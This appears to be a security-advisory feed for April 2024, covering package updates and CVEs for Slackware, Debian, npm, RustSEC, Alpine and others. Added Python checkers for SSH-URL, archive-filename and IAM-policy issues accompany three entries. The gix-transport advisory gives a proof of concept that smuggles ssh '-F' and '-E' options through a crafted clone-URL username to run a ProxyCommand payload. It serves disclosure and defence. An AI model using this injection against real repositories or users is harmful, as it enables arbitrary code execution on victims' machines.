php81-8.1.28-x86_64-1_slack15.0.txzSlackware -current package:598fd38d4ec67d5dd6c8913b16e5ca6f n/php-8.3.6-i586-1.txzSlackware x86_64 -current package:03bbdf7c6e708ce44e19740728cf2849 n/php-8.3.6-x86_64-1.txz**Installation instructions**Upgrade the package as root:`# upgradepkg php81-8.1.28-i586-1_slack15.0.txz`Then, restart Apache httpd:`# /etc/rc.d/rc.httpd stop``# /etc/rc.d/rc.httpd start`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-103-01
13.04.2024 00:26:31maven[MAVEN:GHSA-79VV-VP32-GPP7] Apache Kafka: Potential incorrect access control during migration from ZK mode to KRaft mode (moderate)While an Apache Kafka cluster is being migrated from ZooKeeper mode to KRaft mode, in some cases ACLs will not be correctly enforced.Two preconditions are needed to trigger the bug:1. The administrator decides to remove an ACL2. The resource associated with the removed ACL continues to have two or more other ACLs associated with it after the removal.When those two preconditions are met, Kafka will treat the resource as if it had only one ACL associated with it after the removal, rather than the two or more that would be correct.The incorrect condition is cleared by removing all brokers in ZK mode, or by adding a new ACL to the affected resource. Once the migration is completed, there is no metadata loss (the ACLs all remain).The full impact depends on the ACLs in use. If only ALLOW ACLs were configured during the migration, the impact would be limited to availability. If DENY ACLs were configured, the impact could include confidentiality and integrity impact depending on the ACLs configured, as the DENY ACLs might be ignored due to this vulnerability during the migration period.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-79VV-VP32-GPP7
12.04.2024 20:11:15almalinux[ALSA-2024:1782] bind and dhcp security update (important)bind and dhcp security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1782
12.04.2024 03:00:00cisa[CISA-2024:0412] CISA Adds One Known Exploited Vulnerability to Catalog (critical)CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0412
12.04.2024 03:00:00debian[DSA-5657-1] xorg-server (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5657-1
12.04.2024 03:00:00redhat[RHSA-2024:1782] bind and dhcp security update (important)The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network.Security Fix(es):* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1782
12.04.2024 16:50:59npm[NPM:GHSA-FPW7-J2HG-69V5] mysql2 Remote Code Execution (RCE) via the readCodeFor function (critical)Versions of the package mysql2 before 3.9.4 are vulnerable to Remote Code Execution (RCE) via the `readCodeFor` function due to improper validation of the `supportBigNumbers` and `bigNumberStrings` values.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FPW7-J2HG-69V5
12.04.2024 21:08:38npm[NPM:GHSA-4WH3-3WF2-39M9] Summernote vulnerable to cross-site scripting (moderate)Cross Site Scripting vulnerability in Summernote v.0.8.18 and before allows a remote attacker to execute arbitrary code via a crafted payload to the `codeview` parameter.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4WH3-3WF2-39M9
12.04.2024 14:48:21almalinux[ALSA-2024:1784] gnutls security update (moderate)gnutls security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1784
12.04.2024 16:00:18almalinux[ALSA-2024:1786] httpd:2.4/mod_http2 security update (important)httpd:2.4/mod_http2 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1786
12.04.2024 14:50:26almalinux[ALSA-2024:1751] unbound security update (important)unbound security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1751
12.04.2024 21:44:24almalinux[ALSA-2024:1781] bind9.16 security update (important)bind9.16 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1781
12.04.2024 15:58:56almalinux[ALSA-2024:1789] bind security update (important)bind security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1789
12.04.2024 16:50:13npm[NPM:GHSA-49J4-86M8-Q2JW] mysql2 vulnerable to Prototype Poisoning (moderate)Versions of the package mysql2 before 3.9.4 are vulnerable to Prototype Poisoning due to insecure results object creation and improper user input sanitization passed through `parserFn` in `text_parser.js` and `binary_parser.js`.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-49J4-86M8-Q2JW
12.04.2024 16:49:53npm[NPM:GHSA-MQR2-W7WJ-JJGR] mysql2 cache poisoning vulnerability (moderate)Versions of the package mysql2 before 3.9.3 are vulnerable to Improper Input Validation through the `keyFromFields` function, resulting in cache poisoning. An attacker can inject a colon `:` character within a value of the attacker-crafted key.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MQR2-W7WJ-JJGR
12.04.2024 14:51:36almalinux[ALSA-2024:1750] unbound security update (important)unbound security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1750
12.04.2024 19:29:46rustsec[RUSTSEC-2024-0333] `rsa-export` is unmaintainedThis crate has been deprecated in favour of using the native support for exporting RSA keys into the standard PEM format. See [docs.rs documentation].In addition to that, the operations in this crate (arithmetic and Base64 encoding) are not done in constant-time, potentially [exposing the user to sidechannel attacks].[docs.rs documentation]: https://docs.rs/rsa/0.9.6/rsa/index.html#pkcs8-rsa-key-encoding[exposing the user to sidechannel attacks]: https://arxiv.org/pdf/2108.04600.pdfhttps://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0333
12.04.2024 19:31:39rustsec[RUSTSEC-2024-0334] `libp2p-tokio-socks5` is unmaintainedNote the repository was archived without an issue so we link directly to the commit that marked the repository as unmaintained.To the best of the original author's knowledge the crate has no vulnerabilities as of the last release, it is just unmaintained due to laziness - new maintainer welcome.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0334
13.04.2024 03:00:00debian[DSA-5658-1] linux (medium)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5658-1
13.04.2024 20:16:35rustsec[RUSTSEC-2024-0335] gix-transport indirect code execution via malicious username

### Summary

`gix-transport` does not check the username part of a URL for text that the external `ssh` program would interpret as an option. A specially crafted clone URL can smuggle options to SSH. The possibilities are syntactically limited, but if a malicious clone URL is used by an application whose current working directory contains a malicious file, arbitrary code execution occurs.

The first `gix` crate with the fix [is version 0.62.0](https://crates.io/crates/gix/0.62.0), and the first fixed `gix` CLI is [version 0.35](https://github.com/Byron/gitoxide/releases/tag/v0.35.0). `gix-transport` [at version v0.42](https://crates.io/crates/gix-transport/0.42.0) is the lowest-level plumbing crate with the fix.

### Details

This is related to the patched vulnerability [RUSTSEC-2023-0064](https://rustsec.org/advisories/RUSTSEC-2023-0064.html), but appears less severe due to a greater attack complexity. Since <https://github.com/Byron/gitoxide/pull/1032>, `gix-transport` checks the host and path portions of a URL for text that has a `-` in a position that will cause `ssh` to interpret part or all of the URL as an option argument. But it does not check the non-mandatory username portion of the URL.

As in Git, when an address is a URL of the form `ssh://username@hostname/path`, or when it takes the special form `username@hostname:dirs/repo`, this is treated as an SSH URL. `gix-transport` will replace some characters in `username` with their `%`-based URL encodings, but otherwise passes `username@hostname` as an argument to the external `ssh` command. This happens even if `username` begins with a hyphen. In that case, `ssh` treats that argument as an option argument, and attempts to interpret and honor it as a sequence of one or more options possibly followed by an operand for the last option.

This is harder to exploit than [RUSTSEC-2023-0064](https://rustsec.org/advisories/RUSTSEC-2023-0064.html), because the possibilities are constrained by:

- The difficulty of forming an option argument `ssh` accepts, given that characters such as `=`, `/`, and `\` are URL-encoded, `:` is removed, and the argument passed to `ssh` contains the `@` sign and subsequent host identifier, which in an effective attack must be parseable as a suffix of the operand passed to the last option. The inability to include a literal `=` prevents the use of `-oNAME=VALUE` (e.g., `-oProxyCommand=payload`). The inability to include a literal `/` or `\` prevents smuggling in a path operand residing outside the current working directory, including on Windows. (Although a `~` character may be smuggled in, `ssh` does not perform its own tilde expansion, so it does not form an absolute path.)
- The difficulty, or perhaps impossibility, of completing a connection (other than when arbitrary code execution has been achieved). This complicates or altogether prevents the use of options such as `-A` and `-X` together with a connection to a real but malicious server. The reason a connection cannot generally be completed when exploiting this vulnerability is that, because the argument `gix-transport` intends as a URL is treated as an option argument, `ssh` treats the subsequent non-option argument `git-upload-pack` as the host instead of the command, but it is not a valid host name. Although `ssh` supports aliases for hosts, even if `git-upload-pack` could be made an alias, that is made difficult by the URL-encoding transformation.

However, an attacker who is able to cause a specially named `ssh` configuration file to be placed in the current working directory can smuggle in an `-F` option referencing the file, and this allows arbitrary command execution.

This scenario is especially plausible because programs that operate on git repositories are often run in untrusted git repositories, sometimes even to operate on another repository. Situations where this is likely, such that an attacker could predict or arrange it, may for some applications include a malicious repository with a malicious submodule configuration.

Other avenues of exploitation exist, but appear to be less severe. For example, the `-E` option can be smuggled to create or append to a file in the current directory (or its target, if it is a symlink). There may also be other significant ways to exploit this that have not yet been discovered, or that would arise with new options in future versions of `ssh`.

### PoC

To reproduce the known case that facilitates arbitrary code execution, first create a file in the current directory named `configfile@example.com`, of the form

```text
ProxyCommand payload
```

where `payload` is a command with an observable side effect. On Unix-like systems, this could be `date | tee vulnerable` or an `xdg-open`, `open`, or other command to launch a graphical application. On Windows, this could be the name of a graphical application already in the search path, such as `calc.exe`.

(Although the syntax permitted in the value of `ProxyCommand` may vary by platform, this is not limited to running commands in the current directory. That limitation only applies to paths directly smuggled in the username, not to the contents of a separate malicious configuration file. Arbitrary other settings may be specified in `configfile@example.com` as well.)

Then run:

```sh
gix clone 'ssh://-Fconfigfile@example.com/abc'
```

Or:

```sh
gix clone -- '-Fconfigfile@example.com:abc/def'
```

(The `--` is required to ensure that `gix` is really passing the argument as a URL for use in `gix-transport`, rather than interpreting it as an option itself, which would not necessarily be a vulnerability.)

In either case, the payload specified in `configfile@example.com` runs, and its side effect can be observed.

Other cases may likewise be produced, in either of the above two forms of SSH addresses. For example, to create or append to the file `errors@example.com`, or to create or append to its target if it is a symlink:

```sh
gix clone 'ssh://-Eerrors@example.com/abc'
```

```sh
gix clone -- '-Eerrors@example.com:abc/def'
```

### Impact

As in [RUSTSEC-2023-0064](https://rustsec.org/advisories/RUSTSEC-2023-0064.html), this would typically require user interaction to trigger an attempt to clone or otherwise connect using the malicious URL. Furthermore, known means of exploiting this vulnerability to execute arbitrary commands require further preparatory steps to establish a specially named file in the current directory. The impact is therefore expected to be lesser, though it is difficult to predict it with certainty because it is not known exactly what scenarios will arise when using the `gix-transport` library.

Users who use applications that make use of `gix-transport` are potentially vulnerable, especially:

- On repositories with submodules that are automatically added, depending how the application manages submodules.
- When operating on other repositories from inside an untrusted repository.
- When reviewing contributions from untrusted developers by checking out a branch from an untrusted fork and performing clones from that location.

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0335
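The check the advisory says `gix-transport` was missing, as an added example that is not gitoxide's code: `parse_ssh_target` recognises both SSH address forms named above, rejects a username, host or path beginning with `-`, and `ssh_argv` additionally places `--` ahead of the destination. The `--` layer assumes an OpenSSH-compatible `ssh` whose option parser treats `--` as the end of options; because other `ssh` implementations may not, the hyphen check is kept regardless. The addresses run through `address_verdict` in `__main__` are the advisory's own PoC strings.

```python
from dataclasses import dataclass
from typing import Optional

# Added example, not gitoxide's code. It parses both SSH address forms the advisory
# names, rejects any component that ssh would read as an option (the username check
# the advisory says was missing), and builds the ssh argv with `--` ahead of the
# destination as a second layer. Assumption: the ssh binary is OpenSSH-compatible and
# honours `--` as the end of options; other ssh implementations may not, which is why
# the hyphen check is kept as well.


@dataclass
class SshTarget:
    user: Optional[str]
    host: str
    path: str


class OptionLikeComponent(ValueError):
    """A URL component that begins with '-' and would be parsed by ssh as an option."""


def _split_user(authority: str):
    user, sep, host = authority.rpartition("@")
    return (user if sep else None), host


def parse_ssh_target(addr: str) -> Optional[SshTarget]:
    """Parse `ssh://[user@]host[/path]` or the scp-like `[user@]host:path`.

    Returns None for anything that is not an SSH address. Raises OptionLikeComponent
    when the username, host or path starts with '-'.
    """
    if addr.startswith("ssh://"):
        authority, _, path = addr[len("ssh://"):].partition("/")
    elif "://" not in addr and ":" in addr:
        authority, _, path = addr.partition(":")
        if "/" in authority:   # git's rule: a slash before the first colon means a local path
            return None
    else:
        return None
    user, host = _split_user(authority)
    for name, value in (("username", user), ("host", host), ("path", path)):
        if value and value.startswith("-"):
            raise OptionLikeComponent(f"{name} {value!r} would be read by ssh as an option")
    return SshTarget(user, host, path)


def address_verdict(addr: str) -> str:
    """'not-ssh', 'rejected' or 'ok', for use before any external command is spawned."""
    try:
        target = parse_ssh_target(addr)
    except OptionLikeComponent:
        return "rejected"
    return "ok" if target else "not-ssh"


def ssh_argv(target: SshTarget, remote_command: str = "git-upload-pack") -> list:
    """argv for the external ssh: `--` guarantees the destination is never an option."""
    dest = f"{target.user}@{target.host}" if target.user else target.host
    return ["ssh", "--", dest, remote_command, target.path]


if __name__ == "__main__":
    for addr in ("ssh://-Fconfigfile@example.com/abc", "-Fconfigfile@example.com:abc/def",
                 "ssh://-Eerrors@example.com/abc", "git@example.com:org/repo.git"):
        print(f"{addr!r:45} -> {address_verdict(addr)}")
```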
14.04.2024 21:39:08slackware[SSA:2024-105-01] lessNew less packages are available for Slackware 15.0 and -current to fix a security issue.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/less-653-i586-1_slack15.0.txz: Upgraded. This update patches a security issue: less through 653 allows OS command execution via a newline character in the name of a file, because quoting is mishandled in filename.c. Exploitation typically requires use with attacker-controlled file names, such as the files extracted from an untrusted archive. Exploitation also requires the LESSOPEN environment variable, but this is set by default in many common cases. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-32487 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/less-653-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/less-653-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/less-653-i586-2.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/less-653-x86_64-2.txz**MD5 signatures**Slackware 15.0 package:9842df0d8ee0085de310d263a1ae22d3 less-653-i586-1_slack15.0.txzSlackware x86_64 15.0 package:c2097fdbe9a6c2a806dbc33e8168ce00 less-653-x86_64-1_slack15.0.txzSlackware -current package:a6f91c16d33d74e2159c7329fbfcf03f a/less-653-i586-2.txzSlackware x86_64 -current package:060d1dff94545a40f02c517bb55cd2e3 a/less-653-x86_64-2.txz**Installation instructions**Upgrade the package as root:`# upgradepkg less-653-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-105-01
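The two preconditions the less advisory above states for CVE-2024-32487 (an attacker-controlled file name containing a newline, and a LESSOPEN preprocessor in the environment), as an added pre-flight check that is not part of the Slackware advisory or of less: `names_unsafe_for_less` lists archive members whose names embed a newline or carriage return, `lessopen_active` tests the environment, and `assess` combines the two. The tar archive is constructed in memory and nothing is written to disk.

```python
import io
import os
import tarfile

# Added example, not part of the Slackware advisory or of less. The advisory gives two
# preconditions for CVE-2024-32487: an attacker-controlled file name containing a newline,
# and a LESSOPEN preprocessor in the environment. These functions test both before the
# contents of an untrusted archive are handed to less. The archive is constructed in
# memory; nothing is written to disk.


def build_sample_archive() -> bytes:
    """Constructed tar with one ordinary member and one whose name embeds a newline."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name in ("README", "notes\nsecond-line"):
            data = b"hello\n"
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def names_unsafe_for_less(tar_bytes: bytes) -> list:
    """Member names containing a newline (the advisory's trigger) or a carriage return,
    which the same quoting logic is equally unlikely to handle."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        return [m.name for m in tf.getmembers() if "\n" in m.name or "\r" in m.name]


def lessopen_active(environ=None) -> bool:
    """True when a LESSOPEN preprocessor is configured (the advisory's second precondition)."""
    env = os.environ if environ is None else environ
    return bool(env.get("LESSOPEN"))


def assess(tar_bytes: bytes, environ=None) -> str:
    """'exploitable' when both preconditions hold, 'suspicious-names' when only the
    file names are bad (still worth refusing), 'clean' otherwise."""
    bad = names_unsafe_for_less(tar_bytes)
    if not bad:
        return "clean"
    return "exploitable" if lessopen_active(environ) else "suspicious-names"


if __name__ == "__main__":
    archive = build_sample_archive()
    print(repr(names_unsafe_for_less(archive)))
    print(assess(archive, {"LESSOPEN": "| /usr/bin/lesspipe.sh %s"}))
    print(assess(archive, {}))
```

Refusing archives with `suspicious-names` even when LESSOPEN is unset is the safer policy: the environment of the user who eventually opens the extracted files is not known at extraction time.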
14.04.2024 03:00:00debian[DSA-5659-1] trafficserver security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5659-1
15.04.2024 23:25:06npm[NPM:GHSA-846G-P7HM-F54R] AWS Amplify CLI has incorrect trust policy management (high)Amazon AWS Amplify CLI before 12.10.1 incorrectly configures the role trust policy of IAM roles associated with Amplify projects. When the Authentication component is removed from an Amplify project, a Condition property is removed but "Effect":"Allow" remains present, and consequently sts:AssumeRoleWithWebIdentity would be available to threat actors with no conditions. Thus, if Amplify CLI had been used to remove the Authentication component from a project built between August 2019 and January 2024, an "assume role" may have occurred, and may have been leveraged to obtain unauthorized access to an organization's AWS resources. NOTE: the problem could only occur if an authorized AWS user removed an Authentication component. (The vulnerability did not give a threat actor the ability to remove an Authentication component.) However, in realistic situations, an authorized AWS user may have removed an Authentication component, e.g., if the objective were to stop using built-in Cognito resources, or move to a completely different identity provider.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-846G-P7HM-F54R
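The policy shape the Amplify advisory above describes, as an added example that is not AWS or Amplify CLI code: a role trust policy whose `sts:AssumeRoleWithWebIdentity` statement keeps `"Effect":"Allow"` after its `Condition` was dropped, a scanner that flags such statements (including wildcarded actions and an empty `Condition` object), and a repair that re-scopes the grant to one identity pool and role type. The trust policy is constructed; the condition keys follow the Cognito identity-pool convention and the pool id is a placeholder.

```python
import copy
import fnmatch
import json

# Added example, not AWS or Amplify CLI code. The trust policy below is constructed to
# show the shape the advisory describes: an Allow on sts:AssumeRoleWithWebIdentity whose
# Condition has been removed. The condition keys used to repair it follow the Cognito
# identity-pool convention (cognito-identity.amazonaws.com:aud and :amr); the identity
# pool id is a placeholder, not a real pool.

IDENTITY_POOL_ID = "us-east-1:00000000-0000-0000-0000-000000000000"  # placeholder

UNCONDITIONED_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "cognito-identity.amazonaws.com"},
        "Action": "sts:AssumeRoleWithWebIdentity",
    }],
}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _grants_web_identity(action: str) -> bool:
    # IAM action names are matched case-insensitively and may carry '*' wildcards.
    return fnmatch.fnmatchcase("sts:assumerolewithwebidentity", action.lower())


def unconditioned_web_identity_statements(policy: dict) -> list:
    """Indexes of Allow statements that grant sts:AssumeRoleWithWebIdentity without a Condition."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if not any(_grants_web_identity(a) for a in _as_list(stmt.get("Action"))):
            continue
        if not stmt.get("Condition"):   # missing or empty: any token from the provider will do
            findings.append(i)
    return findings


def restore_identity_pool_condition(policy: dict, pool_id: str, amr: str = "authenticated") -> dict:
    """Copy of the policy with every unconditioned web-identity grant re-scoped to one
    identity pool (aud) and one role type (amr: 'authenticated' or 'unauthenticated')."""
    fixed = copy.deepcopy(policy)
    fixed["Statement"] = _as_list(fixed.get("Statement"))
    for i in unconditioned_web_identity_statements(fixed):
        fixed["Statement"][i]["Condition"] = {
            "StringEquals": {"cognito-identity.amazonaws.com:aud": pool_id},
            "ForAnyValue:StringLike": {"cognito-identity.amazonaws.com:amr": amr},
        }
    return fixed


if __name__ == "__main__":
    print("unconditioned:", unconditioned_web_identity_statements(UNCONDITIONED_TRUST_POLICY))
    repaired = restore_identity_pool_condition(UNCONDITIONED_TRUST_POLICY, IDENTITY_POOL_ID)
    print(json.dumps(repaired, indent=2))
    print("after repair:", unconditioned_web_identity_statements(repaired))
```

Whether to restore the condition or delete the statement depends on whether the role is still meant to be assumed by an identity pool at all; for a role whose Authentication component was removed and not replaced, deleting the grant is the cleaner fix, and the scanner identifies which statement that is.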
15.04.2024 19:44:00ubuntu[USN-6734-1] libvirt vulnerabilities (medium)Several security issues were fixed in libvirt.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6734-1
15.04.2024 19:37:17ubuntu[USN-6733-1] GnuTLS vulnerabilities (medium)Several security issues were fixed in GnuTLS.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6733-1
15.04.2024 19:29:45ubuntu[USN-6732-1] WebKitGTK vulnerabilities (high)Several security issues were fixed in WebKitGTK.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6732-1
15.04.2024 13:27:32ubuntu[USN-6731-1] YARD vulnerabilities (high)Several security issues were fixed in yard.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6731-1
15.04.2024 03:00:00debian[DSA-5660-1] php7.4 (critical)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5660-1
15.04.2024 03:00:00debian[DSA-5661-1] php8.2 (critical)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5661-1
15.04.2024 03:00:00oraclelinux[ELSA-2024-1784] gnutls security update (moderate)[3.6.16-8.3_fips]- Allow RSA keygen with modulus sizes bigger than 3072 bits and validate the seed length as defined in FIPS 186-4 section B.3.2 [Orabug: 33200526]- Allow bigger known RSA modulus sizes when calling rsa_generate_fips186_4_keypair directly [Orabug: 33200526]- Change Epoch from 1 to 10_fips[3.6.16-8.3]- Fix memleak with older GMP (RHEL-28957)[3.6.16-8.2]- Fix timing side-channel in deterministic ECDSA (RHEL-28957)[3.6.16-8.1]- auth/rsa-psk: minimize branching after decryption (RHEL-21586)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1784
17.04.2024 00:25:54ubuntu[USN-6726-2] Linux kernel (IoT) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6726-2
16.04.2024 23:56:05ubuntu[USN-6725-2] Linux kernel (AWS) vulnerabilities (critical)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6725-2
16.04.2024 23:15:09alpinelinux[ALPINE:CVE-2022-24809] net-snmp vulnerability (medium)[From CVE-2022-24809] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-only credentials can use a malformed OID in a `GET-NEXT` to the `nsVacmAccessTable` to cause a NULL pointer dereference. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24809
16.04.2024 23:15:09alpinelinux[ALPINE:CVE-2022-24810] net-snmp vulnerability (medium)[From CVE-2022-24810] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-write credentials can use a malformed OID in a SET to the nsVacmAccessTable to cause a NULL pointer dereference. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24810
16.04.2024 23:15:08alpinelinux[ALPINE:CVE-2022-24806] net-snmp vulnerability (medium)[From CVE-2022-24806] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-write credentials can exploit an Improper Input Validation vulnerability when SETing malformed OIDs in master agent and subagent simultaneously. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24806
16.04.2024 23:15:08 alpinelinux [ALPINE:CVE-2022-24807] net-snmp vulnerability (medium)
[From CVE-2022-24807] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a malformed OID in a SET request to `SNMP-VIEW-BASED-ACM-MIB::vacmAccessTable` can cause an out-of-bounds memory access. A user with read-write credentials can exploit the issue. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24807

16.04.2024 23:15:08 alpinelinux [ALPINE:CVE-2022-24808] net-snmp vulnerability (medium)
[From CVE-2022-24808] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-write credentials can use a malformed OID in a `SET` request to `NET-SNMP-AGENT-MIB::nsLogTable` to cause a NULL pointer dereference. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24808

16.04.2024 23:15:07 alpinelinux [ALPINE:CVE-2022-24805] net-snmp vulnerability (medium)
[From CVE-2022-24805] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a buffer overflow in the handling of the `INDEX` of `NET-SNMP-VACM-MIB` can cause an out-of-bounds memory access. A user with read-only credentials can exploit the issue. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24805

16.04.2024 23:07:50 ubuntu [USN-6724-2] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6724-2
16.04.2024 21:53:34 slackware [SSA:2024-107-01] mozilla-firefox
New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/mozilla-firefox-115.10.0esr-i686-1_slack15.0.txz: Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/firefox/115.10.0/releasenotes/
    https://www.mozilla.org/security/advisories/mfsa2024-19/
    https://www.cve.org/CVERecord?id=CVE-2024-3852
    https://www.cve.org/CVERecord?id=CVE-2024-3854
    https://www.cve.org/CVERecord?id=CVE-2024-3857
    https://www.cve.org/CVERecord?id=CVE-2024-2609
    https://www.cve.org/CVERecord?id=CVE-2024-3859
    https://www.cve.org/CVERecord?id=CVE-2024-3861
    https://www.cve.org/CVERecord?id=CVE-2024-3863
    https://www.cve.org/CVERecord?id=CVE-2024-3302
    https://www.cve.org/CVERecord?id=CVE-2024-3864
  (* Security fix *)
```

**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.10.0esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.10.0esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.10.0esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.10.0esr-x86_64-1.txz

**MD5 signatures**
Slackware 15.0 package:
6fc4d1333dca494396f1ddda30956558 mozilla-firefox-115.10.0esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
a3b0fc920fccd4242a80186833ef9732 mozilla-firefox-115.10.0esr-x86_64-1_slack15.0.txz

Slackware -current package:
dd3c39d4b6e117992b6bf4e10fdb2145 xap/mozilla-firefox-115.10.0esr-i686-1.txz

Slackware x86_64 -current package:
f67526bba7676157c6dd19870ceb0ee4 xap/mozilla-firefox-115.10.0esr-x86_64-1.txz

**Installation instructions**
Upgrade the package as root:
`# upgradepkg mozilla-firefox-115.10.0esr-i686-1_slack15.0.txz`
